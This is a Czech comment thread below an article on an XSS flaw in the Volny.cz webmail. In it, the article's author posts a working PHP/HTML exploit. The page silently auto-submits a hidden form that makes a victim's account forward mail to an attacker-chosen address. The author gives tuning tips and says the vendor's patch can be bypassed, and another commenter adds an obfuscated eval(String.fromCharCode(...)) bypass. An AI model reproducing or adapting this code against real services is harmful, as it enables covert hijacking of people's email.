Zpět na seznam článků     Zpět na článek

Komentáře ke článku

 
 
 BBCode
kgsws | 80.83.71.*14.10.2007 21:05
je to strašný, proč to neopraví?
jedna možnost co stím
eval(String.fromCharCode(115,101,108,102,46,111,112,101,110,101,114,46,104,105,115,116,111,114,121,46,98,97,99,107,40,49,41,59))
další možnost umístit celej script na jinej server
.cCuMiNn. | E-mail | Website | PGP12.10.2007 11:39
m: aha, už mi to došlo... :)
Tady to máš:

<?php
$email = stripslashes($_GET["email"]);
$url = stripslashes($_GET["url"]);
?>

<html><head></head><body>
<form name="fakeform" action="<?php echo htmlspecialchars($url); ?>/app/forward.php" method="post">
<input type="hidden" name="copy" value="1">
<input type="hidden" name="aliases" value="<?php echo htmlspecialchars($email); ?>">
<input type="hidden" name="action_save.x" value="36">
<input type="hidden" name="action_save.y" value="5">
</form>
<script type="text/javascript">document.fakeform.submit()</script>
</body></html>


----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
.cCuMiNn. | E-mail | Website | PGP12.10.2007 11:33
m: Tak tentokrát tě nechápu. Ano, hlásí to z toho důvodu, že již není exploit funkční. S trochou důvtipu, si jej však můžeš upravit, aby funkční opět byl :)

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
m | 195.122.204.*12.10.2007 11:01
muzete zverejnit toto?
[link] - hlasi to, ze soubor neexistuje.
vzhledem k tomu, ze exploit nefunguje,
tak bez toho mi to cele prijde jen jako teoreticke placani.
Harvie. | 194.228.61.170/172.27.200.*12.10.2007 9:55
"Proč Volny.cz oznámenou zranitelnost neopravil? Zřejmě proto, že jejich webmasteři nejsou o případných následcích dostatečně informováni a v existenci XSS nespatřují žádná rizika."

Hele ja bych spis rek, ze na to serou...
.cCuMiNn. | E-mail | Website | PGP12.10.2007 7:55
der: Vždyť to píši, že to opravili :)
Přehazují písmento z
self.opener.history.back(1);
na
self.opener.hitsory.back(1);

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
der | 86.49.49.*12.10.2007 7:36
tak me to take nefunguje a to ani s
self.opener.hitsory.back(1);
takze uz to maji opravene?
D&3m0n22 | E-mail | ICQ 27350550012.10.2007 7:23
Krásnej článek. Jako obvykle .cCumMiNn. nezklamal. Thx
To Filippop123: zkus Gmail.com, je free a nejlepší. Možná ale jenom do doby než se do něj .cCuMiNn. pustí.
.cCuMiNn. | E-mail | Website | PGP12.10.2007 6:50
Aha, tak jsem to teď znovu zkoušel a zdá se, že si tentokrát admini pospíšili a provedli jakousi opravu, která přehazuje písmena ve slově history.
self.opener.hitsory.back(1);

Obávám se však, že toto jako ochrana rozhodně nestačí a půjde to jednoduše obejít.

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
.cCuMiNn. | E-mail | Website | PGP12.10.2007 6:36
Exploit se samozřejmě spustí až po zobrazení mailu v html formátu a je odzkoušen v IE a FF. jediné místo, které by mohlo způsobovat nefunkčnost by bylo vaše pomalé spojení. V tom případě by to chtělo zvětšit časový limit, po který script čeká na načtení stránky: setTimeout("atack()",2000);

jinak, to, že je e-mail zobrazen v jiném okně není problém, četli jste si odstavec o tom, jak exploit funguje?

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.

Stránky: 1 2